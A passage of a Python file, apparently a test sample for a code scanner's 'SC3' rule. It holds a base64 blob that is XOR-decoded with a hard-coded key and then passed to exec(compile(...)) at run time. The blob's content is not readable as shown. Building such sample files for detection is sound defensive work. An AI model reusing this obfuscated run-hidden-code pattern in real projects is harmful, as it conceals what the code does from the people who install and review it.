h7i9m4ZIXDegubGKl00ea+e9s92KTF08t/Sx1ukLE3Pl9OuagANQPKjh+pOGA0Ahpr2z3d9JXzynr7HTwwlWK6DysdbPC0gu7JuZloULbAyr8P6avHQTbvixsaC8RlI6q87M3dkhE3Plsf6eikUbes8="
_K = bytes.fromhex("c59193ffe32b3353")

def _xor(buf, k):
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(buf))

def _decode():
    raw = base64.b64decode(_BLOB)
    return _xor(raw, _K).decode("utf-8")

if __name__ == "__main__":
    # SC3 signature: base64.b64decode(...) -> exec / compile near by
    exec(compile(_decode(), "<runtime>", "exec"), {})
